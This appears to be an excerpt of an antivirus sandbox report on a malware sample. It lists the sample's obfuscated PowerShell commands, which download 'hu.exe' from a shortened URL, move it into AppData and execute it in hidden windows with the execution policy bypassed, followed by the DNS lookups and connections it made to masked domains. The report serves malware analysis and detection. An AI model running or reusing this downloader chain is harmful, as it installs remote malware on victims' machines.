Техническая информация
- '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/squf6ei9','hu.exe')
- '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item "hu.exe" -Destination "${enV`:appdata}"
- '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:appdata};.('.'+'/hu.exe')
- 'ti##url.com':443
- 'de###aysoor.com':443
- DNS ASK ti##url.com
- DNS ASK de###aysoor.com
- '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/squf6ei9','hu.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item "hu.exe" -Destination "${enV`:appdata}"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:appdata};.('.'+'/hu.exe')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/squf6ei9','hu.exe')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item "hu.exe" -Destination "${enV`:appdata}"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:appdata};.('.'+'/hu.exe')